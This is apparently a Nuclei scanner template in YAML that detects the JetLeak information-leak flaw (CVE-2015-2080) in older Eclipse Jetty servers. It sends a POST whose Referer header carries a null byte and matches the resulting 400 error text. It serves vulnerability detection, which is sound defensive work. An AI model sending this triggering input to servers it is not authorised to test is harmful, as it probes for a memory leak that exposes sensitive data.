31 lines
969 B
YAML
31 lines
969 B
YAML
id: CVE-2015-2080
|
|
|
|
info:
|
|
name: Eclipse Jetty Remote Leakage
|
|
author: pikpikcu
|
|
severity: medium
|
|
reference:
|
|
- https://github.com/eclipse/jetty.project/blob/jetty-9.2.x/advisories/2015-02-24-httpparser-error-buffer-bleed.md
|
|
- https://blog.gdssecurity.com/labs/2015/2/25/jetleak-vulnerability-remote-leakage-of-shared-buffers-in-je.html
|
|
- http://packetstormsecurity.com/files/130567/Jetty-9.2.8-Shared-Buffer-Leakage.html
|
|
description: |
|
|
The exception handling code in Eclipse Jetty before 9.2.9.v20150224 allows remote attackers to obtain sensitive information from process memory via illegal characters in an HTTP header, aka JetLeak
|
|
tags: cve,cve2015,jetty
|
|
|
|
requests:
|
|
- method: POST
|
|
path:
|
|
- "{{BaseURL}}"
|
|
headers:
|
|
Referer: \x00
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: status
|
|
status:
|
|
- 400
|
|
- type: word
|
|
words:
|
|
- "Illegal character 0x0 in state"
|
|
part: body
|